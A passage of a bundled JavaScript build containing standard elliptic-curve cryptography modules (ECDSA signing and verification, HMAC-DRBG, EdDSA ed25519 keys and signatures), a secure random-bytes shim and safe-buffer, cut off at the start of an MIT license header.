        if (priv.cmp(ns2) > 0) continue;
        priv.iaddn(1);
        return this.keyFromPrivate(priv);
    }
};
$17ac898fe5b06379$var$EC.prototype._truncateToN = function _truncateToN(msg, truncOnly) {
    var delta = msg.byteLength() * 8 - this.n.bitLength();
    if (delta > 0) msg = msg.ushrn(delta);
    if (!truncOnly && msg.cmp(this.n) >= 0) return msg.sub(this.n);
    else return msg;
};
$17ac898fe5b06379$var$EC.prototype.sign = function sign(msg, key, enc, options) {
    if (typeof enc === "object") {
        options = enc;
        enc = null;
    }
    if (!options) options = {};
    key = this.keyFromPrivate(key, enc);
    msg = this._truncateToN(new $jX0xT(msg, 16));
    // Zero-extend key to provide enough entropy
    var bytes = this.n.byteLength();
    var bkey = key.getPrivate().toArray("be", bytes);
    // Zero-extend nonce to have the same byte size as N
    var nonce = msg.toArray("be", bytes);
    // Instantiate Hmac_DRBG
    var drbg = new $kKonu({
        hash: this.hash,
        entropy: bkey,
        nonce: nonce,
        pers: options.pers,
        persEnc: options.persEnc || "utf8"
    });
    // Number of bytes to generate
    var ns1 = this.n.sub(new $jX0xT(1));
    for(var iter = 0;; iter++){
        var k = options.k ? options.k(iter) : new $jX0xT(drbg.generate(this.n.byteLength()));
        k = this._truncateToN(k, true);
        if (k.cmpn(1) <= 0 || k.cmp(ns1) >= 0) continue;
        var kp = this.g.mul(k);
        if (kp.isInfinity()) continue;
        var kpX = kp.getX();
        var r = kpX.umod(this.n);
        if (r.cmpn(0) === 0) continue;
        var s = k.invm(this.n).mul(r.mul(key.getPrivate()).iadd(msg));
        s = s.umod(this.n);
        if (s.cmpn(0) === 0) continue;
        var recoveryParam = (kp.getY().isOdd() ? 1 : 0) | (kpX.cmp(r) !== 0 ? 2 : 0);
        // Use complement of `s`, if it is > `n / 2`
        if (options.canonical && s.cmp(this.nh) > 0) {
            s = this.n.sub(s);
            recoveryParam ^= 1;
        }
        return new $i46nc({
            r: r,
            s: s,
            recoveryParam: recoveryParam
        });
    }
};
$17ac898fe5b06379$var$EC.prototype.verify = function verify(msg, signature, key, enc) {
    msg = this._truncateToN(new $jX0xT(msg, 16));
    key = this.keyFromPublic(key, enc);
    signature = new $i46nc(signature, "hex");
    // Perform primitive values validation
    var r = signature.r;
    var s = signature.s;
    if (r.cmpn(1) < 0 || r.cmp(this.n) >= 0) return false;
    if (s.cmpn(1) < 0 || s.cmp(this.n) >= 0) return false;
    // Validate signature
    var sinv = s.invm(this.n);
    var u1 = sinv.mul(msg).umod(this.n);
    var u2 = sinv.mul(r).umod(this.n);
    var p;
    if (!this.curve._maxwellTrick) {
        p = this.g.mulAdd(u1, key.getPublic(), u2);
        if (p.isInfinity()) return false;
        return p.getX().umod(this.n).cmp(r) === 0;
    }
    // NOTE: Greg Maxwell's trick, inspired by:
    // https://git.io/vad3K
    p = this.g.jmulAdd(u1, key.getPublic(), u2);
    if (p.isInfinity()) return false;
    // Compare `p.x` of Jacobian point with `r`,
    // this will do `p.x == r * p.z^2` instead of multiplying `p.x` by the
    // inverse of `p.z^2`
    return p.eqXToP(r);
};
$17ac898fe5b06379$var$EC.prototype.recoverPubKey = function(msg, signature, j, enc) {
    $17ac898fe5b06379$var$assert((3 & j) === j, "The recovery param is more than two bits");
    signature = new $i46nc(signature, enc);
    var n = this.n;
    var e = new $jX0xT(msg);
    var r = signature.r;
    var s = signature.s;
    // A set LSB signifies that the y-coordinate is odd
    var isYOdd = j & 1;
    var isSecondKey = j >> 1;
    if (r.cmp(this.curve.p.umod(this.curve.n)) >= 0 && isSecondKey) throw new Error("Unable to find sencond key candinate");
    // 1.1. Let x = r + jn.
    if (isSecondKey) r = this.curve.pointFromX(r.add(this.curve.n), isYOdd);
    else r = this.curve.pointFromX(r, isYOdd);
    var rInv = signature.r.invm(n);
    var s1 = n.sub(e).mul(rInv).umod(n);
    var s2 = s.mul(rInv).umod(n);
    // 1.6.1 Compute Q = r^-1 (sR -  eG)
    //               Q = r^-1 (sR + -eG)
    return this.g.mulAdd(s1, r, s2);
};
$17ac898fe5b06379$var$EC.prototype.getKeyRecoveryParam = function(e, signature, Q, enc) {
    signature = new $i46nc(signature, enc);
    if (signature.recoveryParam !== null) return signature.recoveryParam;
    for(var i = 0; i < 4; i++){
        var Qprime;
        try {
            Qprime = this.recoverPubKey(e, signature, i);
        } catch (e) {
            continue;
        }
        if (Qprime.eq(Q)) return i;
    }
    throw new Error("Unable to find valid recovery factor");
};

});
parcelRequire.register("kKonu", function(module, exports) {
"use strict";

var $kiSKt = parcelRequire("kiSKt");

var $lC4vN = parcelRequire("lC4vN");

var $koC21 = parcelRequire("koC21");
function $f1ab03780ebd0ab4$var$HmacDRBG(options) {
    if (!(this instanceof $f1ab03780ebd0ab4$var$HmacDRBG)) return new $f1ab03780ebd0ab4$var$HmacDRBG(options);
    this.hash = options.hash;
    this.predResist = !!options.predResist;
    this.outLen = this.hash.outSize;
    this.minEntropy = options.minEntropy || this.hash.hmacStrength;
    this._reseed = null;
    this.reseedInterval = null;
    this.K = null;
    this.V = null;
    var entropy = $lC4vN.toArray(options.entropy, options.entropyEnc || "hex");
    var nonce = $lC4vN.toArray(options.nonce, options.nonceEnc || "hex");
    var pers = $lC4vN.toArray(options.pers, options.persEnc || "hex");
    $koC21(entropy.length >= this.minEntropy / 8, "Not enough entropy. Minimum is: " + this.minEntropy + " bits");
    this._init(entropy, nonce, pers);
}
module.exports = $f1ab03780ebd0ab4$var$HmacDRBG;
$f1ab03780ebd0ab4$var$HmacDRBG.prototype._init = function init(entropy, nonce, pers) {
    var seed = entropy.concat(nonce).concat(pers);
    this.K = new Array(this.outLen / 8);
    this.V = new Array(this.outLen / 8);
    for(var i = 0; i < this.V.length; i++){
        this.K[i] = 0x00;
        this.V[i] = 0x01;
    }
    this._update(seed);
    this._reseed = 1;
    this.reseedInterval = 0x1000000000000; // 2^48
};
$f1ab03780ebd0ab4$var$HmacDRBG.prototype._hmac = function hmac() {
    return new $kiSKt.hmac(this.hash, this.K);
};
$f1ab03780ebd0ab4$var$HmacDRBG.prototype._update = function update(seed) {
    var kmac = this._hmac().update(this.V).update([
        0x00
    ]);
    if (seed) kmac = kmac.update(seed);
    this.K = kmac.digest();
    this.V = this._hmac().update(this.V).digest();
    if (!seed) return;
    this.K = this._hmac().update(this.V).update([
        0x01
    ]).update(seed).digest();
    this.V = this._hmac().update(this.V).digest();
};
$f1ab03780ebd0ab4$var$HmacDRBG.prototype.reseed = function reseed(entropy, entropyEnc, add, addEnc) {
    // Optional entropy enc
    if (typeof entropyEnc !== "string") {
        addEnc = add;
        add = entropyEnc;
        entropyEnc = null;
    }
    entropy = $lC4vN.toArray(entropy, entropyEnc);
    add = $lC4vN.toArray(add, addEnc);
    $koC21(entropy.length >= this.minEntropy / 8, "Not enough entropy. Minimum is: " + this.minEntropy + " bits");
    this._update(entropy.concat(add || []));
    this._reseed = 1;
};
$f1ab03780ebd0ab4$var$HmacDRBG.prototype.generate = function generate(len, enc, add, addEnc) {
    if (this._reseed > this.reseedInterval) throw new Error("Reseed is required");
    // Optional encoding
    if (typeof enc !== "string") {
        addEnc = add;
        add = enc;
        enc = null;
    }
    // Optional additional data
    if (add) {
        add = $lC4vN.toArray(add, addEnc || "hex");
        this._update(add);
    }
    var temp = [];
    while(temp.length < len){
        this.V = this._hmac().update(this.V).digest();
        temp = temp.concat(this.V);
    }
    var res = temp.slice(0, len);
    this._update(add);
    this._reseed++;
    return $lC4vN.encode(res, enc);
};

});

parcelRequire.register("lPqzs", function(module, exports) {
"use strict";

var $jX0xT = parcelRequire("jX0xT");

var $gEVtY = parcelRequire("gEVtY");
var $fe42f8d68750188b$var$assert = $gEVtY.assert;
function $fe42f8d68750188b$var$KeyPair(ec, options) {
    this.ec = ec;
    this.priv = null;
    this.pub = null;
    // KeyPair(ec, { priv: ..., pub: ... })
    if (options.priv) this._importPrivate(options.priv, options.privEnc);
    if (options.pub) this._importPublic(options.pub, options.pubEnc);
}
module.exports = $fe42f8d68750188b$var$KeyPair;
$fe42f8d68750188b$var$KeyPair.fromPublic = function fromPublic(ec, pub, enc) {
    if (pub instanceof $fe42f8d68750188b$var$KeyPair) return pub;
    return new $fe42f8d68750188b$var$KeyPair(ec, {
        pub: pub,
        pubEnc: enc
    });
};
$fe42f8d68750188b$var$KeyPair.fromPrivate = function fromPrivate(ec, priv, enc) {
    if (priv instanceof $fe42f8d68750188b$var$KeyPair) return priv;
    return new $fe42f8d68750188b$var$KeyPair(ec, {
        priv: priv,
        privEnc: enc
    });
};
$fe42f8d68750188b$var$KeyPair.prototype.validate = function validate() {
    var pub = this.getPublic();
    if (pub.isInfinity()) return {
        result: false,
        reason: "Invalid public key"
    };
    if (!pub.validate()) return {
        result: false,
        reason: "Public key is not a point"
    };
    if (!pub.mul(this.ec.curve.n).isInfinity()) return {
        result: false,
        reason: "Public key * N != O"
    };
    return {
        result: true,
        reason: null
    };
};
$fe42f8d68750188b$var$KeyPair.prototype.getPublic = function getPublic(compact, enc) {
    // compact is optional argument
    if (typeof compact === "string") {
        enc = compact;
        compact = null;
    }
    if (!this.pub) this.pub = this.ec.g.mul(this.priv);
    if (!enc) return this.pub;
    return this.pub.encode(enc, compact);
};
$fe42f8d68750188b$var$KeyPair.prototype.getPrivate = function getPrivate(enc) {
    if (enc === "hex") return this.priv.toString(16, 2);
    else return this.priv;
};
$fe42f8d68750188b$var$KeyPair.prototype._importPrivate = function _importPrivate(key, enc) {
    this.priv = new $jX0xT(key, enc || 16);
    // Ensure that the priv won't be bigger than n, otherwise we may fail
    // in fixed multiplication method
    this.priv = this.priv.umod(this.ec.curve.n);
};
$fe42f8d68750188b$var$KeyPair.prototype._importPublic = function _importPublic(key, enc) {
    if (key.x || key.y) {
        // Montgomery points only have an `x` coordinate.
        // Weierstrass/Edwards points on the other hand have both `x` and
        // `y` coordinates.
        if (this.ec.curve.type === "mont") $fe42f8d68750188b$var$assert(key.x, "Need x coordinate");
        else if (this.ec.curve.type === "short" || this.ec.curve.type === "edwards") $fe42f8d68750188b$var$assert(key.x && key.y, "Need both x and y coordinate");
        this.pub = this.ec.curve.point(key.x, key.y);
        return;
    }
    this.pub = this.ec.curve.decodePoint(key, enc);
};
// ECDH
$fe42f8d68750188b$var$KeyPair.prototype.derive = function derive(pub) {
    if (!pub.validate()) $fe42f8d68750188b$var$assert(pub.validate(), "public point not validated");
    return pub.mul(this.priv).getX();
};
// ECDSA
$fe42f8d68750188b$var$KeyPair.prototype.sign = function sign(msg, enc, options) {
    return this.ec.sign(msg, this, enc, options);
};
$fe42f8d68750188b$var$KeyPair.prototype.verify = function verify(msg, signature) {
    return this.ec.verify(msg, signature, this);
};
$fe42f8d68750188b$var$KeyPair.prototype.inspect = function inspect() {
    return "<Key priv: " + (this.priv && this.priv.toString(16, 2)) + " pub: " + (this.pub && this.pub.inspect()) + " >";
};

});

parcelRequire.register("i46nc", function(module, exports) {
"use strict";

var $jX0xT = parcelRequire("jX0xT");

var $gEVtY = parcelRequire("gEVtY");
var $d26d8b510bde7292$var$assert = $gEVtY.assert;
function $d26d8b510bde7292$var$Signature(options, enc) {
    if (options instanceof $d26d8b510bde7292$var$Signature) return options;
    if (this._importDER(options, enc)) return;
    $d26d8b510bde7292$var$assert(options.r && options.s, "Signature without r or s");
    this.r = new $jX0xT(options.r, 16);
    this.s = new $jX0xT(options.s, 16);
    if (options.recoveryParam === undefined) this.recoveryParam = null;
    else this.recoveryParam = options.recoveryParam;
}
module.exports = $d26d8b510bde7292$var$Signature;
function $d26d8b510bde7292$var$Position() {
    this.place = 0;
}
function $d26d8b510bde7292$var$getLength(buf, p) {
    var initial = buf[p.place++];
    if (!(initial & 0x80)) return initial;
    var octetLen = initial & 0xf;
    // Indefinite length or overflow
    if (octetLen === 0 || octetLen > 4) return false;
    var val = 0;
    for(var i = 0, off = p.place; i < octetLen; i++, off++){
        val <<= 8;
        val |= buf[off];
        val >>>= 0;
    }
    // Leading zeroes
    if (val <= 0x7f) return false;
    p.place = off;
    return val;
}
function $d26d8b510bde7292$var$rmPadding(buf) {
    var i = 0;
    var len = buf.length - 1;
    while(!buf[i] && !(buf[i + 1] & 0x80) && i < len)i++;
    if (i === 0) return buf;
    return buf.slice(i);
}
$d26d8b510bde7292$var$Signature.prototype._importDER = function _importDER(data, enc) {
    data = $gEVtY.toArray(data, enc);
    var p = new $d26d8b510bde7292$var$Position();
    if (data[p.place++] !== 0x30) return false;
    var len = $d26d8b510bde7292$var$getLength(data, p);
    if (len === false) return false;
    if (len + p.place !== data.length) return false;
    if (data[p.place++] !== 0x02) return false;
    var rlen = $d26d8b510bde7292$var$getLength(data, p);
    if (rlen === false) return false;
    var r = data.slice(p.place, rlen + p.place);
    p.place += rlen;
    if (data[p.place++] !== 0x02) return false;
    var slen = $d26d8b510bde7292$var$getLength(data, p);
    if (slen === false) return false;
    if (data.length !== slen + p.place) return false;
    var s = data.slice(p.place, slen + p.place);
    if (r[0] === 0) {
        if (r[1] & 0x80) r = r.slice(1);
        else // Leading zeroes
        return false;
    }
    if (s[0] === 0) {
        if (s[1] & 0x80) s = s.slice(1);
        else // Leading zeroes
        return false;
    }
    this.r = new $jX0xT(r);
    this.s = new $jX0xT(s);
    this.recoveryParam = null;
    return true;
};
function $d26d8b510bde7292$var$constructLength(arr, len) {
    if (len < 0x80) {
        arr.push(len);
        return;
    }
    var octets = 1 + (Math.log(len) / Math.LN2 >>> 3);
    arr.push(octets | 0x80);
    while(--octets)arr.push(len >>> (octets << 3) & 0xff);
    arr.push(len);
}
$d26d8b510bde7292$var$Signature.prototype.toDER = function toDER(enc) {
    var r = this.r.toArray();
    var s = this.s.toArray();
    // Pad values
    if (r[0] & 0x80) r = [
        0
    ].concat(r);
    // Pad values
    if (s[0] & 0x80) s = [
        0
    ].concat(s);
    r = $d26d8b510bde7292$var$rmPadding(r);
    s = $d26d8b510bde7292$var$rmPadding(s);
    while(!s[0] && !(s[1] & 0x80))s = s.slice(1);
    var arr = [
        0x02
    ];
    $d26d8b510bde7292$var$constructLength(arr, r.length);
    arr = arr.concat(r);
    arr.push(0x02);
    $d26d8b510bde7292$var$constructLength(arr, s.length);
    var backHalf = arr.concat(s);
    var res = [
        0x30
    ];
    $d26d8b510bde7292$var$constructLength(res, backHalf.length);
    res = res.concat(backHalf);
    return $gEVtY.encode(res, enc);
};

});


parcelRequire.register("esmmS", function(module, exports) {
"use strict";

var $kiSKt = parcelRequire("kiSKt");

var $fbTbW = parcelRequire("fbTbW");

var $gEVtY = parcelRequire("gEVtY");
var $a865080dcef76248$var$assert = $gEVtY.assert;
var $a865080dcef76248$var$parseBytes = $gEVtY.parseBytes;

var $1D85n = parcelRequire("1D85n");

var $7XcGE = parcelRequire("7XcGE");
function $a865080dcef76248$var$EDDSA(curve) {
    $a865080dcef76248$var$assert(curve === "ed25519", "only tested with ed25519 so far");
    if (!(this instanceof $a865080dcef76248$var$EDDSA)) return new $a865080dcef76248$var$EDDSA(curve);
    curve = $fbTbW[curve].curve;
    this.curve = curve;
    this.g = curve.g;
    this.g.precompute(curve.n.bitLength() + 1);
    this.pointClass = curve.point().constructor;
    this.encodingLength = Math.ceil(curve.n.bitLength() / 8);
    this.hash = $kiSKt.sha512;
}
module.exports = $a865080dcef76248$var$EDDSA;
/**
* @param {Array|String} message - message bytes
* @param {Array|String|KeyPair} secret - secret bytes or a keypair
* @returns {Signature} - signature
*/ $a865080dcef76248$var$EDDSA.prototype.sign = function sign(message, secret) {
    message = $a865080dcef76248$var$parseBytes(message);
    var key = this.keyFromSecret(secret);
    var r = this.hashInt(key.messagePrefix(), message);
    var R = this.g.mul(r);
    var Rencoded = this.encodePoint(R);
    var s_ = this.hashInt(Rencoded, key.pubBytes(), message).mul(key.priv());
    var S = r.add(s_).umod(this.curve.n);
    return this.makeSignature({
        R: R,
        S: S,
        Rencoded: Rencoded
    });
};
/**
* @param {Array} message - message bytes
* @param {Array|String|Signature} sig - sig bytes
* @param {Array|String|Point|KeyPair} pub - public key
* @returns {Boolean} - true if public key matches sig of message
*/ $a865080dcef76248$var$EDDSA.prototype.verify = function verify(message, sig, pub) {
    message = $a865080dcef76248$var$parseBytes(message);
    sig = this.makeSignature(sig);
    var key = this.keyFromPublic(pub);
    var h = this.hashInt(sig.Rencoded(), key.pubBytes(), message);
    var SG = this.g.mul(sig.S());
    var RplusAh = sig.R().add(key.pub().mul(h));
    return RplusAh.eq(SG);
};
$a865080dcef76248$var$EDDSA.prototype.hashInt = function hashInt() {
    var hash = this.hash();
    for(var i = 0; i < arguments.length; i++)hash.update(arguments[i]);
    return $gEVtY.intFromLE(hash.digest()).umod(this.curve.n);
};
$a865080dcef76248$var$EDDSA.prototype.keyFromPublic = function keyFromPublic(pub) {
    return $1D85n.fromPublic(this, pub);
};
$a865080dcef76248$var$EDDSA.prototype.keyFromSecret = function keyFromSecret(secret) {
    return $1D85n.fromSecret(this, secret);
};
$a865080dcef76248$var$EDDSA.prototype.makeSignature = function makeSignature(sig) {
    if (sig instanceof $7XcGE) return sig;
    return new $7XcGE(this, sig);
};
/**
* * https://tools.ietf.org/html/draft-josefsson-eddsa-ed25519-03#section-5.2
*
* EDDSA defines methods for encoding and decoding points and integers. These are
* helper convenience methods, that pass along to utility functions implied
* parameters.
*
*/ $a865080dcef76248$var$EDDSA.prototype.encodePoint = function encodePoint(point) {
    var enc = point.getY().toArray("le", this.encodingLength);
    enc[this.encodingLength - 1] |= point.getX().isOdd() ? 0x80 : 0;
    return enc;
};
$a865080dcef76248$var$EDDSA.prototype.decodePoint = function decodePoint(bytes) {
    bytes = $gEVtY.parseBytes(bytes);
    var lastIx = bytes.length - 1;
    var normed = bytes.slice(0, lastIx).concat(bytes[lastIx] & -129);
    var xIsOdd = (bytes[lastIx] & 0x80) !== 0;
    var y = $gEVtY.intFromLE(normed);
    return this.curve.pointFromY(y, xIsOdd);
};
$a865080dcef76248$var$EDDSA.prototype.encodeInt = function encodeInt(num) {
    return num.toArray("le", this.encodingLength);
};
$a865080dcef76248$var$EDDSA.prototype.decodeInt = function decodeInt(bytes) {
    return $gEVtY.intFromLE(bytes);
};
$a865080dcef76248$var$EDDSA.prototype.isPoint = function isPoint(val) {
    return val instanceof this.pointClass;
};

});
parcelRequire.register("1D85n", function(module, exports) {
"use strict";

var $gEVtY = parcelRequire("gEVtY");
var $12ffb49ca423a34b$var$assert = $gEVtY.assert;
var $12ffb49ca423a34b$var$parseBytes = $gEVtY.parseBytes;
var $12ffb49ca423a34b$var$cachedProperty = $gEVtY.cachedProperty;
/**
* @param {EDDSA} eddsa - instance
* @param {Object} params - public/private key parameters
*
* @param {Array<Byte>} [params.secret] - secret seed bytes
* @param {Point} [params.pub] - public key point (aka `A` in eddsa terms)
* @param {Array<Byte>} [params.pub] - public key point encoded as bytes
*
*/ function $12ffb49ca423a34b$var$KeyPair(eddsa, params) {
    this.eddsa = eddsa;
    this._secret = $12ffb49ca423a34b$var$parseBytes(params.secret);
    if (eddsa.isPoint(params.pub)) this._pub = params.pub;
    else this._pubBytes = $12ffb49ca423a34b$var$parseBytes(params.pub);
}
$12ffb49ca423a34b$var$KeyPair.fromPublic = function fromPublic(eddsa, pub) {
    if (pub instanceof $12ffb49ca423a34b$var$KeyPair) return pub;
    return new $12ffb49ca423a34b$var$KeyPair(eddsa, {
        pub: pub
    });
};
$12ffb49ca423a34b$var$KeyPair.fromSecret = function fromSecret(eddsa, secret) {
    if (secret instanceof $12ffb49ca423a34b$var$KeyPair) return secret;
    return new $12ffb49ca423a34b$var$KeyPair(eddsa, {
        secret: secret
    });
};
$12ffb49ca423a34b$var$KeyPair.prototype.secret = function secret() {
    return this._secret;
};
$12ffb49ca423a34b$var$cachedProperty($12ffb49ca423a34b$var$KeyPair, "pubBytes", function pubBytes() {
    return this.eddsa.encodePoint(this.pub());
});
$12ffb49ca423a34b$var$cachedProperty($12ffb49ca423a34b$var$KeyPair, "pub", function pub() {
    if (this._pubBytes) return this.eddsa.decodePoint(this._pubBytes);
    return this.eddsa.g.mul(this.priv());
});
$12ffb49ca423a34b$var$cachedProperty($12ffb49ca423a34b$var$KeyPair, "privBytes", function privBytes() {
    var eddsa = this.eddsa;
    var hash = this.hash();
    var lastIx = eddsa.encodingLength - 1;
    var a = hash.slice(0, eddsa.encodingLength);
    a[0] &= 248;
    a[lastIx] &= 127;
    a[lastIx] |= 64;
    return a;
});
$12ffb49ca423a34b$var$cachedProperty($12ffb49ca423a34b$var$KeyPair, "priv", function priv() {
    return this.eddsa.decodeInt(this.privBytes());
});
$12ffb49ca423a34b$var$cachedProperty($12ffb49ca423a34b$var$KeyPair, "hash", function hash() {
    return this.eddsa.hash().update(this.secret()).digest();
});
$12ffb49ca423a34b$var$cachedProperty($12ffb49ca423a34b$var$KeyPair, "messagePrefix", function messagePrefix() {
    return this.hash().slice(this.eddsa.encodingLength);
});
$12ffb49ca423a34b$var$KeyPair.prototype.sign = function sign(message) {
    $12ffb49ca423a34b$var$assert(this._secret, "KeyPair can only verify");
    return this.eddsa.sign(message, this);
};
$12ffb49ca423a34b$var$KeyPair.prototype.verify = function verify(message, sig) {
    return this.eddsa.verify(message, sig, this);
};
$12ffb49ca423a34b$var$KeyPair.prototype.getSecret = function getSecret(enc) {
    $12ffb49ca423a34b$var$assert(this._secret, "KeyPair is public only");
    return $gEVtY.encode(this.secret(), enc);
};
$12ffb49ca423a34b$var$KeyPair.prototype.getPublic = function getPublic(enc) {
    return $gEVtY.encode(this.pubBytes(), enc);
};
module.exports = $12ffb49ca423a34b$var$KeyPair;

});

parcelRequire.register("7XcGE", function(module, exports) {
"use strict";

var $jX0xT = parcelRequire("jX0xT");

var $gEVtY = parcelRequire("gEVtY");
var $5ca7e26f93e1a560$var$assert = $gEVtY.assert;
var $5ca7e26f93e1a560$var$cachedProperty = $gEVtY.cachedProperty;
var $5ca7e26f93e1a560$var$parseBytes = $gEVtY.parseBytes;
/**
* @param {EDDSA} eddsa - eddsa instance
* @param {Array<Bytes>|Object} sig -
* @param {Array<Bytes>|Point} [sig.R] - R point as Point or bytes
* @param {Array<Bytes>|bn} [sig.S] - S scalar as bn or bytes
* @param {Array<Bytes>} [sig.Rencoded] - R point encoded
* @param {Array<Bytes>} [sig.Sencoded] - S scalar encoded
*/ function $5ca7e26f93e1a560$var$Signature(eddsa, sig) {
    this.eddsa = eddsa;
    if (typeof sig !== "object") sig = $5ca7e26f93e1a560$var$parseBytes(sig);
    if (Array.isArray(sig)) sig = {
        R: sig.slice(0, eddsa.encodingLength),
        S: sig.slice(eddsa.encodingLength)
    };
    $5ca7e26f93e1a560$var$assert(sig.R && sig.S, "Signature without R or S");
    if (eddsa.isPoint(sig.R)) this._R = sig.R;
    if (sig.S instanceof $jX0xT) this._S = sig.S;
    this._Rencoded = Array.isArray(sig.R) ? sig.R : sig.Rencoded;
    this._Sencoded = Array.isArray(sig.S) ? sig.S : sig.Sencoded;
}
$5ca7e26f93e1a560$var$cachedProperty($5ca7e26f93e1a560$var$Signature, "S", function S() {
    return this.eddsa.decodeInt(this.Sencoded());
});
$5ca7e26f93e1a560$var$cachedProperty($5ca7e26f93e1a560$var$Signature, "R", function R() {
    return this.eddsa.decodePoint(this.Rencoded());
});
$5ca7e26f93e1a560$var$cachedProperty($5ca7e26f93e1a560$var$Signature, "Rencoded", function Rencoded() {
    return this.eddsa.encodePoint(this.R());
});
$5ca7e26f93e1a560$var$cachedProperty($5ca7e26f93e1a560$var$Signature, "Sencoded", function Sencoded() {
    return this.eddsa.encodeInt(this.S());
});
$5ca7e26f93e1a560$var$Signature.prototype.toBytes = function toBytes() {
    return this.Rencoded().concat(this.Sencoded());
};
$5ca7e26f93e1a560$var$Signature.prototype.toHex = function toHex() {
    return $gEVtY.encode(this.toBytes(), "hex").toUpperCase();
};
module.exports = $5ca7e26f93e1a560$var$Signature;

});





parcelRequire.register("f7USH", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $hkN9y = parcelRequire("hkN9y");
function $b033a1df439f47f4$var$getRandomBytes(bytes) {
    return new Promise(function(resolve, reject) {
        $hkN9y(bytes, function(err, resp) {
            if (err) {
                reject(err);
                return;
            }
            resolve(resp);
        });
    });
}
module.exports.getRandomBytes = $b033a1df439f47f4$var$getRandomBytes;
function $b033a1df439f47f4$var$getRandomBytesSync(bytes) {
    return $hkN9y(bytes);
}
module.exports.getRandomBytesSync = $b033a1df439f47f4$var$getRandomBytesSync;

});
parcelRequire.register("hkN9y", function(module, exports) {

var $hPtJY = parcelRequire("hPtJY");
"use strict";
// limit of Crypto.getRandomValues()
// https://developer.mozilla.org/en-US/docs/Web/API/Crypto/getRandomValues
var $c9ea6eb6e1b0be83$var$MAX_BYTES = 65536;
// Node supports requesting up to this number of bytes
// https://github.com/nodejs/node/blob/master/lib/internal/crypto/random.js#L48
var $c9ea6eb6e1b0be83$var$MAX_UINT32 = 4294967295;
function $c9ea6eb6e1b0be83$var$oldBrowser() {
    throw new Error("Secure random number generation is not supported by this browser.\nUse Chrome, Firefox or Internet Explorer 11");
}

var $1U9GM = parcelRequire("1U9GM");
var $c9ea6eb6e1b0be83$require$Buffer = $1U9GM.Buffer;
var $c9ea6eb6e1b0be83$var$crypto = $parcel$global.crypto || $parcel$global.msCrypto;
if ($c9ea6eb6e1b0be83$var$crypto && $c9ea6eb6e1b0be83$var$crypto.getRandomValues) module.exports = $c9ea6eb6e1b0be83$var$randomBytes;
else module.exports = $c9ea6eb6e1b0be83$var$oldBrowser;
function $c9ea6eb6e1b0be83$var$randomBytes(size, cb) {
    // phantomjs needs to throw
    if (size > $c9ea6eb6e1b0be83$var$MAX_UINT32) throw new RangeError("requested too many random bytes");
    var bytes = $c9ea6eb6e1b0be83$require$Buffer.allocUnsafe(size);
    if (size > 0) {
        if (size > $c9ea6eb6e1b0be83$var$MAX_BYTES) // can do at once see https://developer.mozilla.org/en-US/docs/Web/API/window.crypto.getRandomValues
        for(var generated = 0; generated < size; generated += $c9ea6eb6e1b0be83$var$MAX_BYTES)// buffer.slice automatically checks if the end is past the end of
        // the buffer so we don't have to here
        $c9ea6eb6e1b0be83$var$crypto.getRandomValues(bytes.slice(generated, generated + $c9ea6eb6e1b0be83$var$MAX_BYTES));
        else $c9ea6eb6e1b0be83$var$crypto.getRandomValues(bytes);
    }
    if (typeof cb === "function") return $hPtJY.nextTick(function() {
        cb(null, bytes);
    });
    return bytes;
}

});
parcelRequire.register("1U9GM", function(module, exports) {
/*! safe-buffer. MIT License. Feross Aboukhadijeh <https://feross.org/opensource> */ /* eslint-disable node/no-deprecated-api */ 
var $6ZWSX = parcelRequire("6ZWSX");
var $1632896ed805433d$var$Buffer = $6ZWSX.Buffer;
// alternative to using Object.keys for old browsers
function $1632896ed805433d$var$copyProps(src, dst) {
    for(var key in src)dst[key] = src[key];
}
if ($1632896ed805433d$var$Buffer.from && $1632896ed805433d$var$Buffer.alloc && $1632896ed805433d$var$Buffer.allocUnsafe && $1632896ed805433d$var$Buffer.allocUnsafeSlow) module.exports = $6ZWSX;
else {
    // Copy properties from require('buffer')
    $1632896ed805433d$var$copyProps($6ZWSX, module.exports);
    module.exports.Buffer = $1632896ed805433d$var$SafeBuffer;
}
function $1632896ed805433d$var$SafeBuffer(arg, encodingOrOffset, length) {
    return $1632896ed805433d$var$Buffer(arg, encodingOrOffset, length);
}
$1632896ed805433d$var$SafeBuffer.prototype = Object.create($1632896ed805433d$var$Buffer.prototype);
// Copy static methods from Buffer
$1632896ed805433d$var$copyProps($1632896ed805433d$var$Buffer, $1632896ed805433d$var$SafeBuffer);
$1632896ed805433d$var$SafeBuffer.from = function(arg, encodingOrOffset, length) {
    if (typeof arg === "number") throw new TypeError("Argument must not be a number");
    return $1632896ed805433d$var$Buffer(arg, encodingOrOffset, length);
};
$1632896ed805433d$var$SafeBuffer.alloc = function(size, fill, encoding) {
    if (typeof size !== "number") throw new TypeError("Argument must be a number");
    var buf = $1632896ed805433d$var$Buffer(size);
    if (fill !== undefined) {
        if (typeof encoding === "string") buf.fill(fill, encoding);
        else buf.fill(fill);
    } else buf.fill(0);
    return buf;
};
$1632896ed805433d$var$SafeBuffer.allocUnsafe = function(size) {
    if (typeof size !== "number") throw new TypeError("Argument must be a number");
    return $1632896ed805433d$var$Buffer(size);
};
$1632896ed805433d$var$SafeBuffer.allocUnsafeSlow = function(size) {
    if (typeof size !== "number") throw new TypeError("Argument must be a number");
    return $6ZWSX.SlowBuffer(size);
};

});




parcelRequire.register("aj8Qm", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $781289dd73a1c17e$require$Buffer = $6ZWSX.Buffer;
"use strict";
/*
The MIT License

Copyright (c) 2016 Nick Dodson. nickdodson.com

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE
